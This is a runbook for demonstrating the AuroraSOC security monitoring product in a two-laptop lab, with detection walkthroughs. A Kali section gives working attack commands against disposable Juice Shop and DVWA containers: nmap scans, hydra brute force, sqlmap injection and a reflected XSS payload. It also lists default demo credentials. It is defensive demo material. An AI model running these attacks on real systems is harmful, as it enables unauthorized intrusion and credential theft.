Capabilities Demo Lab

Use this runbook when you want to demonstrate AuroraSOC with two laptops on the same authorized lab network:

• a Windows laptop running AuroraSOC plus disposable, intentionally vulnerable target containers (OWASP Juice Shop and DVWA) under Docker or Podman
• a Kali Linux laptop running real reconnaissance and exploitation tools (nmap, nikto, gobuster, ffuf, hydra, sqlmap) against those targets only

The goal is to generate realistic attacker activity that AuroraSOC can detect, analyze, and respond to, without touching production systems or any third-party hosts.

Safety Scope

This page is for an owned demo network with disposable lab targets only.

• Attack only the intentionally vulnerable containers (lab-juice-shop on port 3001 and lab-dvwa on port 8081) running on the AuroraSOC laptop.
• Never point Kali tooling at the AuroraSOC API (8000), dashboard (3000), the supporting services (Postgres, Redis, NATS, Mosquitto), the Windows host itself, or any other LAN address.
• Keep AuroraSOC in dummy or dry_run unless you are explicitly demonstrating a prepared production-like lab.
• Wipe the vulnerable containers at the end of the demo so credentials, sessions, and seeded data do not persist.
• Do not run reverse shells, post-exploitation frameworks, malware samples, or persistence techniques. The goal is detection signal, not full compromise.
• Tell the audience which parts use live attack traffic against the lab targets and which parts use AuroraSOC showcase or dry-run outputs.

Recommended Demo Mode

For a reliable laptop demo without the specialist agent fleet, use dummy mode. It returns deterministic showcase output for orchestration and network analysis.

Use dry_run when the minimal agent path is running and you want live reads, real detections and cases, autonomous case notes, and simulated downstream response actions.

Demo Topology

What This Demo Shows

Capability	Command or action	What to show in AuroraSOC
Runtime truth	GET /api/v1/system/mode	Settings mode banner and backend mode semantics
Dashboard visibility	Open http://AURORA_HOST_IP:3000	Overview KPIs, seeded alerts, cases, agent registry
Port and service enumeration	nmap -sS -sV -sC against the lab targets	T1046 Network Service Discovery findings
Web vulnerability scanning	nikto -h http://target:8081	Scanner User-Agent and probe pattern in network analysis
Content discovery	gobuster dir, ffuf against the lab web roots	T1083 File and Directory Discovery burst
Credential brute force	hydra against DVWA login	T1110 Brute Force pattern
SQL injection	sqlmap against DVWA ?id= parameter	T1190 Exploit Public-Facing Application
Beaconing simulation	Looped curl calls to a Juice Shop API	T1071.001 Web Protocol C2-style cadence
Orchestrator planning	POST /api/v1/orchestrator/dispatch	Delegated investigation plan and MITRE mapping
Network analysis	POST /api/v1/network-analyzer/analyze	Read-only findings, IOCs, flow/DNS reasoning
SIEM, alerts, cases	Dashboard navigation	Triage handoff, linked case, timeline, evidence path
SOAR guardrails	dry_run: true playbook execution	Expected actions without containment or blocking
Smoke validation	make smoke-minimal-dry-run or smoke script	End-to-end command sequence before the live demo
Deterministic telemetry rehearsal	make demo-lab-ingest or scripts/demo_lab_ingest.py	Stage-safe alerts, cases, and autonomous investigation receipts without relying on live packet capture

Laptop Roles

Windows AuroraSOC Host

The Windows laptop hosts the AuroraSOC API, dashboard, and supporting services. The commands below assume PowerShell from the repository root.

Keep three terminals open:

1. infrastructure logs or Compose status
2. AuroraSOC API server
3. dashboard dev server

Kali Lab Laptop

The Kali laptop runs offensive tools against the disposable lab targets only. It must not scan the AuroraSOC API or dashboard ports, the Windows host itself, or any other LAN address.

Keep two terminals open:

1. offensive tooling against the lab targets (nmap, nikto, gobuster, hydra, sqlmap)
2. authenticated AuroraSOC API calls to drive analysis and response

Windows Host Preflight

Run PowerShell as Administrator if you need to add firewall rules.

# From the AuroraSOC repository root
$AURORA_HOST_IP = (Get-NetIPAddress -AddressFamily IPv4 |
  Where-Object {
    $_.IPAddress -notlike '127.*' -and
    $_.IPAddress -notlike '169.254.*' -and
    $_.InterfaceAlias -notlike '*Loopback*'
  } |
  Select-Object -First 1 -ExpandProperty IPAddress)

Write-Host "AuroraSOC host IP: $AURORA_HOST_IP"

# Allow the demo dashboard and API from the lab network.
if (-not (Get-NetFirewallRule -DisplayName "AuroraSOC Demo API and Dashboard" -ErrorAction SilentlyContinue)) {
  New-NetFirewallRule `
    -DisplayName "AuroraSOC Demo API and Dashboard" `
    -Direction Inbound `
    -Action Allow `
    -Protocol TCP `
    -LocalPort 8000,3000
}

# Allow the disposable, intentionally vulnerable lab targets.
if (-not (Get-NetFirewallRule -DisplayName "AuroraSOC Lab Vulnerable Targets" -ErrorAction SilentlyContinue)) {
  New-NetFirewallRule `
    -DisplayName "AuroraSOC Lab Vulnerable Targets" `
    -Direction Inbound `
    -Action Allow `
    -Protocol TCP `
    -LocalPort 3001,8081
}

If the firewall rule already exists, the helper leaves it unchanged.

Start AuroraSOC Services

Choose the container engine installed on the Windows laptop.

Podman

podman machine start
podman compose -f docker-compose.dev.yml up -d
podman compose -f docker-compose.dev.yml ps

Docker

docker compose -f docker-compose.dev.yml up -d
docker compose -f docker-compose.dev.yml ps

Start the API on all interfaces so the Kali laptop can reach it:

py -3.12 -m venv .venv
. .\.venv\Scripts\Activate.ps1
python -m pip install -e ".[dev]"
alembic upgrade head
uvicorn aurorasoc.api.main:app --host 0.0.0.0 --port 8000 --reload

In a new PowerShell window, start the dashboard on all interfaces:

cd dashboard
npm install
npm run dev -- --hostname 0.0.0.0

Open the dashboard from the Windows laptop first:

http://localhost:3000

Use the demo credentials from the quick start:

Field	Value
Username	admin
Password	admin123!

Deploy The Intentionally Vulnerable Targets

These containers are designed to be attacked. They are isolated to dedicated ports and are removed during cleanup.

Podman

podman run -d --name lab-juice-shop --restart unless-stopped -p 3001:3000 docker.io/bkimminich/juice-shop
podman run -d --name lab-dvwa --restart unless-stopped -p 8081:80 docker.io/vulnerables/web-dvwa
podman ps --filter name=lab-

Docker

docker run -d --name lab-juice-shop --restart unless-stopped -p 3001:3000 bkimminich/juice-shop
docker run -d --name lab-dvwa --restart unless-stopped -p 8081:80 vulnerables/web-dvwa
docker ps --filter name=lab-

Verify both targets are reachable from the Kali laptop:

curl -I "http://${AURORA_HOST_IP}:3001"
curl -I "http://${AURORA_HOST_IP}:8081"

If DVWA shows a setup page on first run, click Create / Reset Database once. Default credentials are admin / password. Set the security level to low from the DVWA Security page so the demo SQLi and XSS payloads succeed.

Select A Safe Runtime Mode

Authenticate once from PowerShell:

$API_BASE = "http://localhost:8000/api/v1"
$TOKEN = (curl.exe -s -X POST "$API_BASE/auth/token" `
  -H "Content-Type: application/json" `
  -d '{"username":"admin","password":"admin123!"}' | ConvertFrom-Json).access_token

For the most reliable laptop-only showcase, set dummy mode:

curl.exe -s -X POST "$API_BASE/system/mode" `
  -H "Authorization: Bearer $TOKEN" `
  -H "Content-Type: application/json" `
  -d '{"mode":"dummy"}'

If the minimal orchestrator and network analyzer agents are running, use dry_run instead:

curl.exe -s -X POST "$API_BASE/system/mode" `
  -H "Authorization: Bearer $TOKEN" `
  -H "Content-Type: application/json" `
  -d '{"mode":"dry_run"}'

Verify the active mode:

curl.exe -s "$API_BASE/system/mode" -H "Authorization: Bearer $TOKEN"

Deterministic Telemetry Rehearsal

Use this when you need the dashboard story to land exactly the same way every time, or when you want a fallback before running the live Kali tooling.

• This helper posts normalized telemetry directly into /api/v1/network-telemetry/ingest.
• It works in dry_run or real mode and exits early if AuroraSOC is still in dummy.
• The payloads are synthetic but aligned to the supported detector thresholds for reconnaissance, web abuse, brute force, DNS tunneling, and exfiltration.

If you want a single command that starts the local dry-run demo stack and then seeds the deterministic telemetry, use the bring-up wrapper:

make demo-lab-up

By default it:

• reconciles the local dependency containers with docker compose -f docker-compose.yml -f docker-compose.dev.yml so Postgres, Redis, NATS, and Ollama are reachable from the host-run API and migrations
• refreshes missing local compose secrets with scripts/bootstrap_env.py, including the local JetStream username and passwords used by the host-run API and migrations
• runs alembic upgrade head
• starts the AuroraSOC API on http://127.0.0.1:8001
• starts the dashboard on http://127.0.0.1:3100
• waits for both endpoints to become reachable
• runs scripts/demo_lab_ingest.py against the fresh dry-run API

Stop the stack afterwards with:

make demo-lab-down

Preview the exact plan without side effects:

make demo-lab-up-dry-run

The wrapper writes API and dashboard logs under .logs/demo-lab/ and keeps the processes alive after the command exits so you can walk the audience straight into the dashboard.

From the AuroraSOC repository root on Linux, macOS, or WSL:

export API_BASE="http://${AURORA_HOST_IP}:8000/api/v1"

./.venv/bin/python scripts/demo_lab_ingest.py \
  --api-base "$API_BASE" \
  --attacker-ip "$KALI_IP" \
  --target-ip "$AURORA_HOST_IP"

Or use the Make wrapper:

AURORASOC_API_BASE="$API_BASE" \
KALI_IP="$KALI_IP" \
AURORA_HOST_IP="$AURORA_HOST_IP" \
make demo-lab-ingest

List the supported scenarios before the demo:

make demo-lab-list

Run only the slices you want to narrate:

./.venv/bin/python scripts/demo_lab_ingest.py \
  --api-base "$API_BASE" \
  --attacker-ip "$KALI_IP" \
  --target-ip "$AURORA_HOST_IP" \
  --scenario recon web-abuse brute-force

Use this deterministic path to populate the dashboard before the live tooling, or keep it as a fallback if packet capture, IDS forwarding, or vulnerable-target instrumentation is too noisy on stage.

If you prefer the wrapper to use different ports, override DEMO_LAB_API_PORT and DEMO_LAB_DASHBOARD_PORT before calling make demo-lab-up.

Kali Attack Playbook

On Kali, set the Windows host IP and the lab target URLs.

export AURORA_HOST_IP="192.168.1.50"
export API_BASE="http://${AURORA_HOST_IP}:8000/api/v1"
export KALI_IP="$(ip -4 route get "$AURORA_HOST_IP" | awk '{for (i=1;i<=NF;i++) if ($i=="src") {print $(i+1); exit}}')"
export TARGET_HOST="$AURORA_HOST_IP"
export DVWA_URL="http://${TARGET_HOST}:8081"
export JUICE_URL="http://${TARGET_HOST}:3001"

mkdir -p ~/aurora-demo && cd ~/aurora-demo

# Confirm reachability of the vulnerable targets only.
curl -I "$JUICE_URL"
curl -I "$DVWA_URL"

Each block below maps to a MITRE ATT&CK technique you will pivot on inside AuroraSOC. Run the blocks in order so the timeline tells a coherent story.

1. Reconnaissance (T1046)

# Service and default-script scan against the known lab ports.
sudo nmap -Pn -sS -sV -sC -p 3001,8081 -oA nmap-services "$TARGET_HOST"

# Wider TCP sweep so AuroraSOC sees a clear scanning signature.
sudo nmap -Pn -p- --min-rate 1000 -oA nmap-allports "$TARGET_HOST"

2. Web Vulnerability Scanning

nikto -h "$DVWA_URL"  -o nikto-dvwa.txt  -Format txt
nikto -h "$JUICE_URL" -o nikto-juice.txt -Format txt

3. Content Discovery (T1083)

gobuster dir -u "$DVWA_URL" \
  -w /usr/share/wordlists/dirb/common.txt \
  -t 30 -o gobuster-dvwa.txt

ffuf -u "${JUICE_URL}/FUZZ" \
  -w /usr/share/wordlists/dirb/common.txt \
  -of csv -o ffuf-juice.csv

4. Credential Brute Force (T1110)

# Capture a fresh DVWA session cookie first (default creds: admin / password).
DVWA_COOKIE="$(curl -s -c - -d 'username=admin&password=password&Login=Login' \
  "${DVWA_URL}/login.php" | awk '/PHPSESSID/ {print $6"="$7}')"
echo "DVWA_COOKIE=$DVWA_COOKIE"

# rockyou.txt ships gzipped on Kali; gunzip it once if needed.
hydra -l admin -P /usr/share/wordlists/rockyou.txt -f -V \
  "$TARGET_HOST" -s 8081 http-post-form \
  "/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"

5. SQL Injection (T1190)

sqlmap -u "${DVWA_URL}/vulnerabilities/sqli/?id=1&Submit=Submit" \
  --cookie="security=low; ${DVWA_COOKIE}" \
  --batch --level=2 --risk=2 --threads=4 --dbs

6. Reflected XSS Probe

curl -s -o /dev/null -w "%{http_code}\n" \
  -b "security=low; ${DVWA_COOKIE}" \
  "${DVWA_URL}/vulnerabilities/xss_r/?name=%3Cscript%3Ealert(1)%3C%2Fscript%3E"

7. Beaconing Cadence (T1071.001)

# Steady, low-jitter outbound HTTP to a Juice Shop API endpoint.
for i in $(seq 1 60); do
  curl -s -o /dev/null "${JUICE_URL}/api/Products?_=$(date +%s%N)"
  sleep 1
done

After each block, jump to AuroraSOC and call the analysis API below so the audience sees AuroraSOC reasoning about the activity in near real time.

Authenticate From Kali

export TOKEN="$(curl -fsS -X POST "$API_BASE/auth/token" \
  -H 'Content-Type: application/json' \
  -d '{"username":"admin","password":"admin123!"}' | jq -r .access_token)"

curl -fsS "$API_BASE/system/mode" \
  -H "Authorization: Bearer $TOKEN" | jq

If jq is not installed, use sudo apt install -y jq or read the raw JSON response.

Demonstrate Orchestrator Planning

Run this from Kali after authentication:

curl -fsS -X POST "$API_BASE/orchestrator/dispatch" \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  -d "{
    \"task\": \"Investigate suspected attack chain from Kali host ${KALI_IP:-unknown} against AuroraSOC lab targets: nmap port and service scanning, nikto web scanning, gobuster directory brute force, hydra login brute force, and sqlmap SQL injection on ports 3001 and 8081\",
    \"priority\": \"high\"
  }" | jq

Show these fields to the audience:

• plan_summary
• delegations
• reasoning
• mitre_techniques
• confidence_policy

In dummy mode this returns a deterministic showcase plan. In dry_run mode the orchestrator returns a non-mutating preview plan.

Demonstrate Read-Only Network Analysis

curl -fsS -X POST "$API_BASE/network-analyzer/analyze" \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  -d "{
    \"query\": \"Correlate reconnaissance, web scanning, brute force, SQL injection, and beaconing originating from ${KALI_IP:-unknown} against ${AURORA_HOST_IP} on ports 3001 and 8081\",
    \"time_range_hours\": 4,
    \"focus_area\": \"multi-stage web attack chain against lab targets\"
  }" | jq

Then list recent findings:

curl -fsS "$API_BASE/network-analyzer/findings" \
  -H "Authorization: Bearer $TOKEN" | jq

Emphasize that the Network Analyzer is read-only. Its restrictions include no IP blocking, no firewall changes, no host isolation, and no playbook execution.

Dashboard Walkthrough

Open the dashboard from Kali or from the Windows laptop:

http://AURORA_HOST_IP:3000

Use this presenter order:

1. Settings: show dummy or dry_run mode and explain why the demo is non-mutating.
2. Overview: show alert volume, case counts, CPS devices, and network findings.
3. SIEM: search seeded events, pivot on source/severity, and promote a representative log when appropriate.
4. Alerts: open a high or critical alert, review IOCs and MITRE mapping, then create or link a case.
5. Cases: show timeline, observables, evidence, comments, and task handoff.
6. Agent Fleet or AI Chat: show agent roles and investigation planning context.
7. Network Analyzer: show findings, DNS/flow breakdown, IOCs, recommendations, and agent reasoning.
8. SOAR: run only a dry-run playbook or request approval without executing containment.

SOAR Dry-Run Example

Use IDs selected from the SOAR and Alerts pages. The example below is intentionally non-mutating.

curl -fsS -X POST "$API_BASE/soar/playbooks/execute" \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{
    "playbook_id": "pb-malware-response",
    "alert_id": "replace-with-demo-alert-id",
    "dry_run": true
  }' | jq

When presenting, focus on the expected steps and approval gates. Do not execute real isolation, IP blocking, account disablement, or certificate revocation during this laptop demo.

Optional Scripted Smoke Path

If the Windows host has WSL or Git Bash and Podman is available, dry-run the scripted validation first:

make smoke-minimal-dry-run

For a fuller minimal-stack validation, use the smoke script from a shell environment that can run Bash:

bash ./scripts/smoke_minimal_stack.sh --dry-run

Run without --dry-run only when the demo laptop has enough resources and local models are already available.

Presenter Run Order

Minute	Action	Talking point
0-2	Show topology and mode	Authorized targets, sandboxed containers, non-mutating responses
2-4	Open Overview and Settings	Operators can tell whether data is showcase, dry run, or real
4-6	Run nmap reconnaissance from Kali	Real scan signal arrives at the AuroraSOC host
6-8	Run nikto and gobuster	Web scanner signature plus directory enumeration burst
8-10	Run hydra brute force	Failed-login pattern AuroraSOC can correlate
10-12	Run sqlmap and the XSS probe	Exploitation signal against the vulnerable web app
12-13	Run the beaconing loop	Persistent low-volume outbound cadence
13-16	Dispatch orchestrator and run network analysis	AuroraSOC turns the timeline into findings, IOCs, MITRE mapping
16-18	Walk Alerts, Cases, SOAR	Triage handoff and dry-run response plan
18-20	Cleanup and recap	Vulnerable containers and rules removed; demo leaves no residue

Cleanup

Stop the dashboard and API terminals with Ctrl+C, then stop the infrastructure services.

Podman

podman rm -f lab-juice-shop lab-dvwa
podman compose -f docker-compose.dev.yml down
Remove-NetFirewallRule -DisplayName "AuroraSOC Demo API and Dashboard" -ErrorAction SilentlyContinue
Remove-NetFirewallRule -DisplayName "AuroraSOC Lab Vulnerable Targets" -ErrorAction SilentlyContinue

Docker

docker rm -f lab-juice-shop lab-dvwa
docker compose -f docker-compose.dev.yml down
Remove-NetFirewallRule -DisplayName "AuroraSOC Demo API and Dashboard" -ErrorAction SilentlyContinue
Remove-NetFirewallRule -DisplayName "AuroraSOC Lab Vulnerable Targets" -ErrorAction SilentlyContinue

Troubleshooting

Kali cannot reach the API

Likely causes: Windows firewall is blocking port 8000, the API is bound to 127.0.0.1, or the laptops are on different VLANs.

Fix:

1. Confirm uvicorn was started with --host 0.0.0.0.
2. Confirm the Windows firewall rule allows port 8000 from the lab network.
3. From Kali, run ping $AURORA_HOST_IP and curl http://$AURORA_HOST_IP:8000/health.

Dashboard opens locally but not from Kali

Likely cause: Next.js is bound to localhost only.

Fix: start it with npm run dev -- --hostname 0.0.0.0 and confirm port 3000 is allowed.

Podman commands fail on Windows

Likely cause: the Podman machine is stopped or the Compose plugin is unavailable.

Fix:

podman machine list
podman machine start
podman compose version

API authentication fails

Use the quick-start demo credential pair: admin / admin123!. If you changed the auth settings, regenerate or check your .env and restart the API.

Network Analyzer fails in dry_run

In dry_run, the Network Analyzer path expects the minimal agent runtime to be available. Switch to dummy for a guaranteed synthetic laptop demo, or start the minimal agent path before the demo.

Playbook execution is blocked

That is expected in dummy and dry_run modes for mutating actions. Use dry_run: true and show the expected actions, approval gates, and rollback model instead of executing containment.

Hydra finishes instantly with no result

Likely cause: rockyou.txt is gzipped on Kali. Run sudo gunzip /usr/share/wordlists/rockyou.txt.gz once before re-running hydra.

sqlmap reports the request is not vulnerable

Likely cause: DVWA security level is not low, or the captured session cookie is stale. Re-login to DVWA, set Security to low, and re-export DVWA_COOKIE before re-running sqlmap.

Lab containers fail to start on ARM hosts

Likely cause: the vulnerables/web-dvwa image only ships amd64 layers. Add --platform linux/amd64 to the docker run or podman run invocation.

Related Pages

• Quick Start
• Operation Modes
• Dashboard Overview
• SIEM Integration
• Alerts Management
• Case Management
• SOAR & Playbooks
• Network Capture Tools
• REST API Endpoints